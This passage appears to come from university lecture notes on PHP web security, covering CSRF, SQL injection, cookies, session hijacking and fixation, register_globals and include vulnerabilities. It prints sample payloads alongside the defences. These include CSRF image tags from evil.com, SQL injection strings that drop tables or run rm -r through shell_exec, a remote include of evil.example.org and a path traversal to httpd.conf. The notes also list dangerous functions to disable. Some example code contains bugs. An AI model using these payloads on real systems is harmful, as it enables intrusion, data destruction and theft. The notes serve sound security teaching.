session_set_cookie_params(lifetime[,path][,domain][,secure][,http-only]) Cross Site Request Forgeries Cross Site Attacks Cross Site Scripting (XSS) attack occurs when a malicious user inserts code into a web-page that a user trusts. Cross Site Request Forgery (CSRF) occurs when a malicious web site causes a user’s web browser to execute an unwanted action on a trusted site. The HTML <img> Tag Insert an image into an HTML document. <img src="http://foo.bar/someImage.gif"> This instructs the browser to (silently) download an image using request: GET http://foo.bar/someImage.gif HTTP/1.1 The <img > tag causes an HTTP GET request by the browser regardless of the value of the given URL. The browser does not know beforehand whether the URL is a gif, jpg or something else. It needs to load/GET it into the browser in order to determine this. After all, the image could be generated by some program. <img src="http://foo.bar/getCurrentImage.php"> Alice is authorised to Access the foo.bar Website Suppose that foo.bar provides an application that can be used to set the current image. For example, Alice requests: GET http://foo.bar/setCurrentImage.php?imageID=1234 in order to set the current image to the image 1234. Suppose that website uses HTTP Basic authentication to control who may access/set the image and Alice has access to the website. Malicious Mike does not have access but would like to change the current image to 5678. He needs to trick Alice into submitting the HTTP request: GET http://foo.bar/setCurrentImage.php?imageID=5678 .. Authorization: Basic ...... (Alice’s credentials) Malicious Mike is not authorised to Access foo.bar Suppose that Malicious Mike owns the website evil.com and the web-page index.html on this site includes <img src="http://foo.bar/setCurrentImage.php?imageID=5678"> 23 Alice visits evil.com/index.html and the image tag causes Alice’s browser to silently perform GET http://foo.bar/setCurrentImage.php?imageID=5678 ..... Note that we assume here that Alice has configured her browser to ’remember’ her userid/password from some previous visit to the foo.bar website and that the browser does not prompt her to confirm entry. CSRF and Same Origin Security Policy A Cross Site Request Forgery occurs when an attacker can get a victim to perform an unwanted action on another site (where the victim holds the authorization to carry out the action). A CSRF attack attempts to exploit authorizations that the victim already holds. If the user has logged on to a web-site (and holds session authentication cookies) then the attacker will try to get the user to carry out an action that is authenticated by those cookies. The same origin policy was designed to prevent an attacker from accessing data on a third party site. The policy does not prevent requests from being sent, it only prevents an attack from reading the data returned from the third party server. Since CSRF attacks are the result of the requests sent then the same origin policy does not protect against a CSRF attack. More CSRF Attacks There have been many examples of CSRF based exploits. These include, CSRF vulnerability on ingdirect.com (2008, online banking) whereby an attacker can transfer money out of a victim’s online bank account. For example, <img src=http://www.mybank.com/transfer.do? fromAccount=document.form.frmAcct&toAccount=4590&amount=3434> YouTube.com (2007), whereby an attacker can add videos to the victim’s account, add himself to the friend/family groups of the victim, share victim’s contacts, flag videos, etc. Making changes to home DSL routers (2006). Even if the victim doesn’t know that he can congure his router! Attacker website uses CSRF with default userid/password for router: <img src=http://admin:password@192.168.1.1/> and then re-configures, for example to change the DNS, <img src=http://192.168.1.1/changeDNS?newDNS=143.23.45.1 Strategy to Help Avoid CSRF Attack? You want to force users to use your own forms when submitting data to your website. Problem with the above attacks is that the websites allowed GETs whereby the data can be provided in the URL as parameter. Any data that is going to be acted upon by a website should be submitted via a POST. Forms should use POST. Your PHP script should use $ POST and not $ REQUEST in the form processing logic. This still won’t work! 24 The attacker can create an HTML page that includes a POST form with hidden fields for all of the relevant parameters required for the attack and has its target set to the vulnerable URL. JavaScript (or Flash) is used to automatically submit the form when the exploit is loaded. Cookies Alone Won’t Prevent CSRFs If a web-application relies solely on HTTP cookies as its mechanism for transmitting session tokens then it is still at risk from this attack. Cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request. Preventing CSRF Attacks Using Synchronizer Tokens The strategy to avoid CSRF is for the application to include a synchronizer token in the HTML form. This is a secure random value that is stored in a hidden field in the form (often called CSRFToken). Every request for the form yields a different value embedded in the form and the attacker cannot guess the the value in a form presented to another user. <form action="/transfer.do" method="post"> <input type="hidden" name="CSRFToken" value="OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTV hM2JmNGYxYjJiMGI4MjJjZDE1ZDZjMTViMGYwMGEwOA=="> ..... </form> When data, presumably from this form, is submitted to the application then the application must look for and check that the synchronizer token is the value expected. This interaction is simple form of challenge-response protocol whereby the application expects to see its challenge embedded in the form as part of the response from a client. We must be careful how we implement the synchronizer tokens. For example, a naive implementation might maintain a list of issued synchronizer tokens in the application: Check that token in a POST is on this list, List will become very large unless we only keep track of recently issued tokens, and let older tokens expire. Need to relate the token to the session, otherwise a malicious user could first request a form in order to obtain a valid and fresh token which is then used in a CSRF involving the form. But this places a burden (state) on the application. A better strategy is to make it stateless by also ‘embedding’ the synchronizer within the session cookie. On receiving the HTTP request the application then checks that the token provided in the form matches the value embedded in the cookie. The attacker will need to know the cookie value in order to construct a valid looking request and carry out the CSRF attack. 25 Implementing the CSRF Synchronizer in PHP We modify the setCurrentImage form to include a hidden CSRFTokenc field with a randomly generated value. This token is unique to and is stored in the user’s session. (weaker token is md5(uniqid(rand(), TRUE))) <?php session_start(); $CSRFToken = openssl_random_pseudo_bytes(32,True); $_SESSION[’CSRFToken’] = $CSRFToken; $_SESSION[’token_time’] = time(); ?> <form action="setCurrentImage.php" method="post"> <input type="hidden" name="CSRFToken" value="<?php echo $CSRFToken; ?>" /> <p> Symbol: <input type="imageID" name="imageID" /><br /> <input type="submit" value="Set" /> </p> </form> Application setCurrentImage.php can now check a request for the correct token. <?php if ($_POST[’CSRFToken’] == $_SESSION[’CSRFToken’] && time() - $_SESSION[’token_time’] <= 300) { // valid request via the form that was recently // issued to the user in this session } ?> This strategy works so long as the attacker cannot discover the session cookies and synchronizer token transmitted to/from the user/application. Avoiding CSRF At the Server: Allow GET requests to only retrieve data, not modify any data on the server. This protects sites from CSRF attacks using <img > tags or other type of GET requests. Require all POST requests to include a synchronizer token. If really critical, use CAPTCHAs, ... At the Client: Logoff immediately after using a Web application Do not allow your browser to save username/passwords, and do not allow sites to remember your login Do not use the same browser session to access sensitive applications and to surf the Internet freely (tabbed browsing). The use of plugins such as No-Script makes POST based CSRF vulnerabilities difficult to exploit. SQL Injection Login Application (variation) 26 Suppose that a login application provided a Forgot Password page whereby a user who has forgotten their password can request it to be sent to their email address: <form action="http://foobar.com/request.php" method="GET"> <p> Email Address: <input type="text" name="email" /></p> <p> <input type="submit" /></p> </form> For simplicity, we’ll assume an unsalted password table: CREATE TABLE ’passwordTable’ ( ’username’ varchar(8) NOT NULL, ’password’ varchar(8) NOT NULL, ’email’ varchar(30) NOT NULL, PRIMARY KEY (’username’) ); Suppose that the request.php script includes the code: $myemail=$_GET[’email’]; // $tbl_name is the password table $sqlQ="SELECT * FROM $tbl_name WHERE email=’$myemail’"; $result=mysql_query($sqlQ); $count=mysql_num_rows($result); if($count==0) { exit ("No user with this email address ".$myuserid) ; }else{ $row= mysql_fetch_array($result); $body= "your password is ".$row["password"]; $subject = "Your password"; mail($myemail,$subject,$body); echo ’Password mailed to ’.$myemail; } Discovery Registered Users Malicious Mike uses this form to test for email address of registered users. For example, the request http://foobar.com/request.php?h.simpson@cs.ucc.ie might result in the "No user with this email [...]" message, while http://foobar.com/request.php?s.foley@cs.ucc.ie results in a message "password mailed to s.foley@cs.ucc.ie" SQL Injection Attack 1 Malicious Mike makes the HTTP request: http://foobar.com/request.php?h.simpson@ucc.ie’ OR 1==1-this results in the following SELECT in the application: SELECT * FROM $tbl_name WHERE email= ’h.simpson@ucc.ie’ OR 1==1--’ 27 (note that the -- forces SQL to drop trailing quotes) This selects the entire table and the particular (poor) logic in the application will take one of the selected rows and email the password to the user. For example, malicious Mike gets the message "password mailed to m.murphy@ucc.ie" and deduces that this is a registered user! SQL Injection Attack 2 SQL injection attack may occur if input data is not properly parsed. In our example we should have checked that the input data was a properly formed email address. IETF document RFC 3696, Application Techniques for Checking and Transformation of Names specifies the only acceptable format for an email address. The PHP function filter var can be used to do limited filtering/checking of email addresses, URLs, etc. For example, filter_var(’bob@example.com’, FILTER_VALIDATE_EMAIL); returns the email address if valid, otherwise false. Note filter var() does not conform to RFC 3696 and will pass a number of strings that are not proper email addresses. For example, s.foley@ucc. See http://www.iamcal.com/publish/articles/php/parsing email/ for a well designed filter. Exploiting Injection Attacks Suppose that the login.php script allows up to three failed login attempts before disabling the account. We could use SQL injection to directly test the backend for userid/password combinations and bypass the 3-attempts control. Having discovered that m.murphy@ucc.ie is in the table, malicious Mike guesses passwords: http://foobar.com/request.php?m.murphy@ucc.ie’ AND password=’attempt1 which translates into the backend query SELECT * FROM $tbl_name WHERE email= ’m.murphy@ucc.ie’ AND password=’attempt1’ Malicious Mike knows that he has guessed the correct password for the user when he gets a "password mailed to m.murphy@ucc.ie" message. More SQL Injections A variety of statements can be injected in this way. For example, http://foobar.com/request.php?x’; INSERT INTO passwordTable VALUES (’simon’, ’nomis’, ’s.foley@cs.ucc.ie’);-http://foobar.com/request.php?x’; DROP TABLE ’passwordTable 28 http://foobar.com/request.php?’; shell_exec(’rm -r *’); -SQL injection attacks may require the attacker to know the table and attribute names in the backend database. However, if the attacker does not know the information he can test and/or guess it. For example, GET and POST parameter names may provide a hint about table attribute names. Also, most DBMS also store information about the database in tables with predefined names. For example, mysql.user gives the table of mysql database users and maybe accessible if the web application happens to be running with the same permissions as the database administrator (root). Avoiding SQL Injection Attacks: Escaping Strings Your application should filter input data: check that input is as expected. Your application should escape output: ensure that data sent to the database cannot be misinterpreted. For example, "O’Sullivan" should be output to the database as "O\’Sullivan". Use function mysql real escape string() to escapes special characters in the unescaped string so that it is safe to place it in a mysql query(). $myemail= $_GET[’email’]; $filteremail= filtervar($myemail, FILTER_VALIDATE_EMAIL); $cleanemail= mysql_real_escape_string($filteremail); // ... $sqlQ="SELECT * FROM $tbl_name WHERE email=’$cleanemail’"; // .... Don’t forget that the result of a query might in turn be used as part of a further query to the DBMS (and therefore should be escaped). Avoiding SQL Injection Attacks: Escaping Integers? Escaping parameters using mysql real escape string( is OK for strings, but it may not work for integer parameters. For example, suppose our tablehad another (integer) attribute userid, then: $myuserid= $_GET[’id’]; $cleanuserid= mysql_real_escape_string($myuserid); // ... $sqlQ="SELECT * FROM $tbl_name WHERE userid=$cleanuserid"; // .... The problem here is that the query assumes an integer parameter and is therefore written without quotes. An injection attack string "1 OR 1==1--" does not need the breaking quote as SQL interprets the query as "SELECT * FROM $tbl name WHERE userid=1 OR 1==1--"; The solution is to either use quotes in the query or validate/clean the input value as an integer (so it really is clean). 29 $cleanuserid= filtervar($myuserid, FILTER VALIDATE INT); Avoiding SQL Injection Attacks: Stored Procedures To further defend against the possibility of SQL injection attack we can define the intended SQL queries as Stored Procedures which ensure that the intended query cannot be modified by injected data. $myemail= $_GET[’email’]; $filteremail= filtervar($myemail, FILTER_VALIDATE_EMAIL); $cleanemail= mysql_real_escape_string($filteremail); // ... $preparedStatement = $db-> prepare("SELECT * FROM $tbl_name WHERE email = :email"); $preparedStatement->execute(array(’:email’ => $cleanemail)); $sqlQ=$preparedStatement->fetchAll(); Any parameters passed to the compiled query will be treated as strings and cannot be misinterpreted as part of the query command. Passing string "h.simpson@ucc.ie’ OR 1==1--" will simply result in a search for a user with email "h.simpson@ucc.ie’ OR 1==1--". Defence in Depth Use stored procedures, filter input, ... Do not give your application root access to the DBMS. A compromised application with root access can do far more damage than an ’ordinary’ database user since it can access the database administration tables (users, etc), drop arbitrary tables, etc. Create a separate database user for your database application. Do not run the DBMS using the administrator account (eg root) of the operating system. An injection attack on an application running on a DBMS that is running as root could use shell exec to execute any operating system command. Create a separate system user to run the DBMS. Prevent PHP from calling OS commands. Disable shell command in the php.ini configuration file: set flag disable functions to include exec,shell exec,system,proc open,popen, ... Conclusion SQL injection results from: Failure to filter input data to application Failure to escape output from application to database Avoiding SQL injection attacks: Filter input data to application Escape output from application to database Principle of least privilege: don’t give the application more authority (DBMS, OS, etc.) than it requires. Don’t run it as root/superuser. Cookies & Sessions Cookies The HTTP protocol is stateless. 30 All HTTP requests are treated as independent events, even when they come from the same client. Cookies provide a mechanism whereby a web-server can manage a stateful relationship with a browser by storing the related state in the client browser and not on the server. The server assigns some state to a cookie, which it includes in the HTTP response. The browser stores the cookie in its browser. The browser includes any cookie(s) it may hold for a web-site when making an HTTP request to that website. Cookies can be used to store a variety of information, for example visit tracking information, authentication information, etc. Secure Cookies An attacker can eavesdrop over an HTTP connection and gather copies of cookies. This is a concern if the cookie contains sensitive information such as usernames and passwords. HTTPS can be used to support authentic and secure HTTP requests and responses: the client may be sure of the identity of the server and the requests/responses are sent in encrypted form over HTTP. The secure flag in a cookie is set by the web-server and indicates that the cookie should only be transmitted over a secure HTTPS connection from the client. When set to TRUE, the cookie will only be set if a secure connection exists. It is up to the developer to decide whether the web application sends this kind of cookie and to be sure that the connection is over HTTPS. The browser will ignore a secure cookie that is not received over HTTPS. Cookie Integrity An attacker that controls the connection can also interfere with the values. HTTPS can be used to secure the connection from this kind of attack. Once the browser receives the cookie, a malicious client can easily modify the cookie value (either directly, or via a proxy such as Paros). The server can use a cryptographic one-way hash function to ensure the integrity of a cookie value. Attempted solution: given a cookie with identifier id and value v, then, given some secret known only to the server, compute a cryptographic checksum using a suitable one-way hash function h(): ck = h(v, secret) and include this hash value in the cookie. An attacker cannot forge ck without knowing the secret. Before using a cookie presented by the browser the application should re-compute the checksum and confirm it matches the checksum provided. 31 PHP script protecting the integrity of the variable value <?php $secret="my server secret"; $seperator = ’--’; if (!isset($_COOKIE[’views’])){ $views=1; }else{ $cut=explode($seperator, $_COOKIE[’views’]); if (md5($cut[0].$secret)==$cut[1]){ $views=$cut[0]+1; }else{ die(’Cookie data corrupted’); } } $splice=$views . $seperator . md5($views.$secret); setcookie(’views’,$splice,0,"/"); echo "I have now seen you = ". $views . " times"; ?> Problems With The Script The script only attempts to prevent the cookie variable value v from corruption: it implements the cookie as [id, v, d, p, h(v, secret)]. A malicious client could take a copy of the cookie [id, v, d, p, h(v, secret)] and change, for example, the expiry date to d′ resulting in the valid cookie [id, v, d′, p, h(v, secret)]. A determined and malicious client might have another cookie [id′, v′, d′, p′, h(v′, secret)] from the same server for a different variable id′. If the same secret was used to compute the checksum of this cookie then the attacker can cut-and-paste variable values to give, for example, the ‘valid’ cookie [id, v′, d, p, h(v, secret)]. We need to secure all the values in the cookie from modification. A Tasty (Good) Cookie Recipe Given cookie attributes $secret a server secret $id a variable identifier, $v a value for the variable $d an expiry date, $p path information, ... then compute a checksum $ck= h($id,$v,$d,$p,$secret, ...), given a suitable one-way hash function h() and a server $secret. sha1 is a reasonable one-way hash function for this. Then we do: setcookie($id, "$v--$ck", $d, $p), where -- is the separator to enable us to distinguish between the variable value and the checksum. A Tasty (Good) Cookie Script <?php $secret="my server secret"; $id=’views’; 32 $expiry=0; $path="\"; $separator = ’--’; if (!isset($_COOKIE[$id])){ $views=1; }else{ $cut=explode($seperator, $_COOKIE[$id]); $views=$cut[0]; $values=$views.$id.$expiry.$path.$secret; if (md5($values)==$cut[1]){ $views=$views+1; }else{ die(’Cookie data corrupted’); } } $splice=$views.$id.$expiry.$path. $secret . $seperator . md5($views); setcookie(’views’,$splice,0,"/"); echo "I have now seen you = ". $views . " times"; ?> No Perfect Cookie A determined and malicious client can still replay ‘old’ cookies with this recipe. For example, when visiting for the fifth time, the client keeps a copy of the cookie. At some later date when the client visits for the tenth time the client can easily replay the old fifth cookie. The server could include a sequence number in the hashed cookie and then keep track of the last sequence number issued to each client. However, this requires state at the server side which defeats the purpose of the cookie. If we are concerned about replay of cookie state then the server should manage the state and use, for example, a PHP session to relate the state to the visiting client (we’ll see this shortly). Authentication Cookies When a user logs in (eg authenticated using the login.php code described earlier in notes) then an authentication cookie is set in the browser by the login program for the website and path. user ! website HTTP request, ... userid, password website ! user HTTP Response, ... AuthCookie When the authenticated user subsequently makes an HTTP request to the website, the authentication cookie is included. user ! website HTTP request, ... AuthCookie Before responding, the website must check that the authentication cookie is valid for the given request. While the underlying mechanics is not unlike Basic HTTP authentication, the advantage to using authentication cookies is that we can associate other attributes with the cookie, such as expiry dates, access constraints, etc. A Tasty Authentication Cookie We can use our ‘tasty’ recipe for authentication cookies. 33 Let capability be a string of attributes that denotes what can be done by a user presenting the cookie. For example, it could include the userid and the URL (to which the user has access). Let expiry be the expiry date of the capability. If serverSecret is a secret known only to the server then the cookie is cookie = (capability,expiry, h(capability.expiry.serverSecret)) So long as h() is a cryptographically strong one-way hash function then the authentication cookie cannot be forged by a malicious user. Furthermore, a legitimate holder of a cookie cannot modify it in order to obtain a different capability. Minimal work is required at the server to validate the cookie, which is good. Make sure the cookie is sent over HTTPS! A not so tasty authentication cookie: FatBrain.com [circa 1999] When a user logs into the website (providing userid and password) an authentication cookie is given to them which contains their userid and sequence number as plaintext (roughly speaking, it was actually encoded using GET attributes). On a subsequent visit, the presented cookie is validated by the server which checks that the sequence number is valid for the given user. However, the scheme used predictable sequence numbers: when a user logs in, the sequence number is simply incremented! This meant that an attacker had a good chance of guessing/predicting other user’s sequence numbers (at the time, fatbrain.com had about 1 userlogin per second). Userids, passwords and sequence numbers where also sent over HTTP which meant that they were vulnerable to an eavesdropping attack. Cookies and Privacy When viewing a Web page, images or other objects may set cookies in the visitor’s browser. A cookie may include information about a visitor that is known by they website that created it: the visitor’s IP address, browsing activity, account information, etc. This information may be used to help tailor advertisements to visitors. Sites may share this information and result in a loss of privacy of the visitor. First-party cookies are cookies that are set by the same domain that is in your browser’s address bar. Remember that a site cannot issue a cookie related to a different domain. Thus, first party cookies can be used to track visitor actions within the domain/website. Third Party Cookies Third-party cookies are cookies that are set by one of objects, images, etc within the web page but coming from a different domain (to that of the web-page). 34 User visits foobar.com/index.html, Page includes an image tag pointing to thirdParty.com/tp.php. Loading the banner image silently sets/checks a cookie for the domain thirdParty.com. Third party cookies can be used to track visitor actions across multiple domains/websites. Most browsers permit third-party cookies by default, but can be configured to block third-party cookies. Suppose that thirdParty.com provides a third-party cookie tracking service to foobar.com and example.com. The script tp.php includes setcookie("TPtracking", "..." , $expires, "/" , ".thirdParty.com"); $image = "R0lGODlhBQAFAJH/AP///wAAAMDAwA ... \n"; header(’Content-type: image/gif’); echo base64_decode($image); foobar.com embeds a 1-pixel square image in index.html: <img src="http://thirdParty.com/tp.php?cust=foobar" width="1" height="1" border="0" > Further information could be passed to tp.php, such as information about what is being viewed on the web-page.thirdParty.com can use this cookie to track a visitor as he/she browses from foobar.com to example.com. Third party (cookie) sites: leaking your information Provide advertising services. First-party sites arrange with ad networks to place ads on their pages via images or javascript code. For example, Google’s Adsense (googlesyndication.com, doubleclick.net), AOL (advertising.com, tacoda.net), Yahoo!(yieldmanager.net) Provide Analytics services: Measure traffic, characterize users by downloading a JavaScript file and send back information in a URL. For example, google-analytics.com (urchin.js), 2o7.net (Omniture),atdmt.com (Microsoft/aquantive), quantserve.com (Quantcast) Tie to a Person: foo.bar provides email service, passes user identity to thirdParty.com/tp.php who can tie to browsing at other (participating) sites. PHP Sessions PHP Sessions provide stateful support for a PHP application whereby certain data may be preserved across subsequent accesses. The data related to a visitor accessing a web-site is associated with a unique session id. The data related to a visitor is stored at the website and the session-id is given to the user as a cookie (or within the URL). On a subsequent access the session-id is used to retrieve the visitor information. For example, suppose that instead of an authentication cookie we use a session to implement (persistent) login: 35 <php? session_start(); // simon is authenticated and permitted access everything $_SESSION[’userid’]= ’simon’; $_SESSION[’access’]= ’all’; echo ’Logged in’; ?> The resulting HTTP response On the first visit by the user, a session id is set as a cookie in response: HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 13:13:22 GMT Server: Apache X-Powered-By: PHP/5.3.2 Set-Cookie: PHPSESSID=a5873580a38a1032d77b452205103aae; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT ... This cookie (session id) is presented on each subsequent visit. PHP also creates a file sess a5873580a38a1032d77b452205103aae in the (server) directory specified by variable session.save path in php.ini. This file contains the data associated with this visitor’s session: userid|s:5:"simon";access|s:3:"all"; Storing Secrets in Sessions Recall our dictum that whenever possible we should avoid storing secrets. Suppose that we stored the user’s password in the session $_SESSION[’password’]= $userpassword; One might argue that the secret is safe as it is stored on the server and not communicated to the client. However, while the website developer may have been careful to properly protect the user passwords in the mysql database he/she may have overlooked the fact that other applications on the server might have access to that part of the file system that contains the session data. We should therefore, wherever possible, secure the session variable values. For example, $_SESSION[’password’]= sha1($userpassword); Brute Force Session id Hijacking If an attacker can determine the session identifier of another visitor then it may be possible for the attacker to hijack the session and masquerade as the other visitor to the website. For example, suppose that Bob’s website generates a new session id by simply incrementing the value of the last session id issued. Alice connects/authenticates to Bob’s website and receives a session id (cookie) sessA. Suppose that malicious Mike knows that Alice recently connected to the website. 36 Malicious Mike connects/authenticates to Bob’s website and receives a session id (cookie) sessM. Malicious Mike repeatedly decrements sessM and visits the website with the value as cookie and will fairly quickly end up making an HTTP request to Bob that appears to come from an authenticated Alice. Session ids should be random and infeasible for an attacker to predict. Suppose that Bob revised his session id algorithm so that when a new session is created the session id is calculated as the md5 hash of the current time catenated with a 4-digit random number. For example, Alice visits website on Sun 7 Nov 2010 15:15, her session id is c3cdfe22f6fa8c72e977db2858b538ad2753 (random val 2753). Malicious Mike visits the website on Sun 7 Nov 2010 15:17, and his session id is 211c021d04984ccfd81bee2c12e407847652. Assuming Mike knows that Alice visited recently, then Bob can brute force Alice’s session id by testing session ids for recent times along with all possible 4-digit ‘random’ values. Mike might have collected his past session identifiers and recognized patterns that indicate how session identifiers are generated. Randomness and Session ids Just because c3cdfe22f6fa8c72e977db2858b538ad2753 is long and looks random does not mean it is random: the last 4 digits provide the ‘randomness’ (assuming they are actually random) and everything else in the number can be predicted. Intuitively, Entropy gives us a measure of the underlying randomness in a variable. In the previous example the entropy is given as approximately 13 bits (the number of bits that represent the random value 0 .. 9999). [Assumes 4 digit numbers cannot be predicted in any way by an attacker] The entropy gives us an idea of how much computational effort is required to guess the session id by brute force means. In practice, session ids should be at least 128 bits in length and should be generated by a secure random number generator which should give an entropy of around the same number of bits. Remember that PHP’s rand function is not secure (pretty close to 0 bits of entropy) and mt rand has around 32 bits of entropy. The openssl secure random number generator is best. Session ids in PHP The standard support for session ids in PHP computes the session id as a one-way hash of a combination of the IP address of the visitor, a time-stamp and the result from a random number generator. From php.ini: ... session.entropy_length = 16 session.entropy_file = /dev/urandom session.hash_function = 1 37 Here we select 16 bytes of entropy from /dev/urandom which is the usual Unix source of ’randomness’ for seeding a random number generator. We also select SHA-1, since it is cryptographically better than MD5. If the file is left blank then the default seeding method is used (above is LAMPS default). Session ids in PHP The standard configuration for session id calculation is weak as it uses a cryptographically weak random number generator whereby the random numbers generated can be predicted with some effort by the attacker (around 32 bits of entropy). An attacker can brute force another user’s session id within approximately 251 hash operations, which is feasible for a wealthy attacker (a modern GPU can achieve around 230 hash operations/second). In a security-critical application you should not rely on the standard PHP support for secure session ids. It should be configured to use a source of cryptographically strong random values and to use a secure one-way hash function. Session Fixation Attack Remember that HTTP is stateless Session ids are used in an application are used to chain HTTP requests together/associate with a visitor. Session ids are used on the server-side to maintain the session state. The authenticated state of a user is just one property of this state and its possible that the session was created before the visitor authenticated himself/herself. Usual strategy is: The very first HTTP response carries the session id to the user (and its not necessarily the result of an authentication). Usually in form of a cookie This session id is used to chain subsequent individual HTTP requests Session Fixation Attack: Overview Session fixation attack: attacker tricks the victim into using a session id that the attacker already knows. 1. The attacker is given a valid session id from a server. For example, as redirect http://foobar.com?PHPSESSID=1234 (set in the URL). 2. The attacker tricks the victim to use this session id for his communication with the server. For example, the victim follows the link http://foobar.com?PHPSESSID=1234 as a result of a CSRF. 3. In this session, victim sends his credentials to the server. For example, victim logs in and $ SESSION[’userid’] is set to their name. 4. From now on, the session is authenticated. As the attacker knows the session id, he now can access the application under victims identity A fixation attack can be avoided if the application regenerates the session id whenever the user authenticates himself/herself and/or when there is a change of privilege. Session Fixation Attack 38 The front page of a website creates a new session for the visitor with an empty shopping cart, if not already created. <?php session_start(); // ... if (!isset($_SESSION[’cart’])){ $_SESSION[’cart]=$emptycart; } // ... ?> At some point visitor decides to authenticate using login.php. This sets the session variable userid (which is necessary in order to checkout, etc.). <?php session_start(); // .... if authenticated then set session variable $_SESSION[’userid’]= $userid; // otherwise leave session variable unset ?> This mechanism is vulnerable to a session fixation attack. Avoiding a Session Fixation Attack When a user logs in then there is a change of privilege associated with the session id. Whenever there is a change of privilege associated with a session id then the application should generate a new session id for the session. That way, any other user (attacker) that happens to know the session id prior to the change of privilege cannot know this new session id. PHP function session regenerate id() performs this task. The login.php can be revised as: <?php session_start(); // .... if user is authenticated then set session variable session_regenerate_id(); $_SESSION[’userid’]= $userid; // otherwise leave session variable unset ?> Security of Session Identifiers If an attacker can determine the session identifier of another visitor then it is possible for the attacker as masquerade as the visitor to the website. Session ids should be communicated over HTTPS. Session ids must be sufficiently long so as to avoid a brute-force guessing of (likely) session ids. Use cryptographically strong session id generation algorithm. It must not be possible for an attacker to predict a session id. Session ids must expire when the user has finished visiting the website and/or within a reasonably short period of time. Do not provide a ’remember me’ check box. 39 Session ids should be regenerated when there is a change of the privilege associated with the session. Session variables may contain sensitive information and should be protected on the server. Miscellaneous PHP Security Aside: Error Reporting You should set the high level of error reporting either in the PHP configuration file php.ini as error reporting = E ALL | E STRICT or programmatically as error reporting (E ALL | E STRICT);. It is useful to have errors displayed in the browser during development, however, once in production errors should not be displayed in the browser since they may convey useful information to an attacker about a failure.This can be done by setting display errors to Off in php.ini or programatically as ini set(’display errors’,’Off’);. Its also important to maintain a log of errors as failures may indicate attacks/intrusion attempts. ini_set(’error_reporting’,E_ALL | E_STRICT); ini_set(’display_errors’,’Off’); ini_set(’log_errors’,’On’); ini_set(’error_log’,’/path/to/logs/error.log’); Making all these settings in both the php.ini file and programmatically provides defense in depth. Register Globals When set to true the php.ini directive register globals registers the EGPCS (Environment, GET, POST, Cookie, Server) variables as global variables. As of PHP 4.2.0, this directive defaults to false. Register globals make writing an application very easy: one simply refers to the form variable name, for example, $username in the PHP script, instead of having to explicitly access it via a super global array, for example, $ GET(’username’). However, this may make it possible for an attacker to influence the execution of a PHP script by being able to set (‘poison’) the value of any variable in the script. Variable Poisoning under Register Globals <?php // define $authorized = true only if user is authenticated if (authenticated_user()) { $authorized = true; } // Because we didn’t first initialize $authorized as false, this might be // defined through register_globals, like from GET auth.php?authorized=1 // So, anyone can be seen as authenticated! if ($authorized) { include "/highly/sensitive/data.php"; } ?> With register globals enabled the logic above may be compromised. 40 When register globals is disabled, $authorized can’t be set via request and the code executes as expected. Regardless of whether register globals is set, it is good programming practice to initialize variables; initializing $authorized to false ensures the code is safe regardless of the setting of register globals. Variable Poisoning under Register Globals Assuming register globals is set, consider: <?php include "$path/script.php"; ?> With register globals enabled, this page can be requested with query ?path=http%3A%2F%2Fevil.example.org%2F%3F resulting in: <?php include ’http://evil.example.org/?/script.php’; ?> If allow url fopen is enabled (it is by default), this will include the output of http://evil.example.org just as if it were a local file. This is a major security vulnerability, and it is one that has been discovered in some popular open source applications. Defensive Programming with Register Globals It is not safe to simply assume that your application will never be deployed on a server with register globals enabled: there is always the chance that the server might have it enabled either by accident or deliberately because another application on the same server requires it to be enabled. You should write your code as if register globals is enabled. Make sure you initialize all your variables and during development set error reporting to E ALL (all errors and warnings) or E ALL | E STRICT (all errors and warnings and suggest changes to code) to alert yourself to the use of un-initialized variables. Not advisable to unset register globals programatically since your application may be shared with other applications that may wish to set it. Also, programmatic access to this variable is deprecated as an ini set option in PHP 5.3.0. Defensive Programming with Register Globals Your code can also look for possible variable poisoning attempts. For example, suppose that a script uses a cookie named mycookie. An attacker might attempt to poison this cookie via a GET or a POST. The script can do a simple sanity check: <?php if (isset($_COOKIE[’mycookie’])) { // mycookie comes from a cookie. // Be sure to validate the cookie data! } elseif (isset($_GET[’mycookie’]) || isset($_POST[’mycookie’])) { mail("admin@example.com", "Possible breakin attempt", $_SERVER[’REMOTE_ADDR’]); echo "Security violation, admin has been alerted."; exit; } else { 41 // mycookie isn’t set through this REQUEST } ?> PHP Includes and Requires Files PHP include and require allow a script to be developed/organized over a number of files. include() takes all the content in a specified file and includes it in the current file. If an error occurs include() generates a warning, but the script will continue execution. include once() same as include() except that if the code from a file has already been included, it will not be included again. require() is identical to include(), except that require() generates a fatal error, and the script will stop. require once() same as require() except that if the code from a file has already been included (require), it will not be included (require) again. Exposed source code with includes and requires Include (and require) files often use a .inc file extension and are stored within the document root. Apache does not recognize this file extension as requiring any special action (unlike .php) and as a result the include files can be requested and displayed in the user browser as plain text. For example, an application includes the file dbconnect.inc: <?php $host= ’localhost’; $user= ’root’; $password= ’root’; $db = ’CS3511’; $dbconnection = mysql_connect($host, $user, $password); // .... ?> Given a GET request on this file, Apache will respond with its contents as plain text (it does not interpret the .inc extension as a PHP file to be executed as PHP). Backdoor URLs A backdoor URL is a resource that can be accessed directly via a URL when direct access is unintended or undesired. For example, a web application might display sensitive data to authenticated users: <?php // ... $authenticated= authenticate_user(); if ($authenticated){ include ’./sensitive.php’; } ?> Since sensitive.php is within the document root then it can be accessed directly by the attacker, bypassing the intended authentication step. To prevent a backdoor URL, place your includes outside of the document root. The only files that should be stored within the document root are those that must be accessible by a URL. 42 Includes Filename Manipulation Part of the filename or pathname is stored in a variable in a dynamic include. For example, you might cache some dynamic parts of a web-page to alleviate the load on the database server: the cache for user simon is stored in /cache/simon.html. <?php Include "/cache/{$_GET[’username’]}.html"; ?> This is vulnerable to filename manipulation and path traversal attacks. For example, an attacker supplies ../../etc/httpd.conf%00 (on some platforms a null value may terminate the string). If your code requires dynamic includes then you must be sure that data is properly filtered, etc. Defenses against exposed includes and requires Use a .php extension for all includes and requires. For example, dbconnect.inc.php. Configure Apache to deny requests for .inc resources. In httpd.conf: <Files ~ "\.inc$"> Order allow,deny Deny from all </Files> Place all requires and includes outside of the document root. Always filter your input data: never include, require, or otherwise open a file with a filename based on user input, without thoroughly 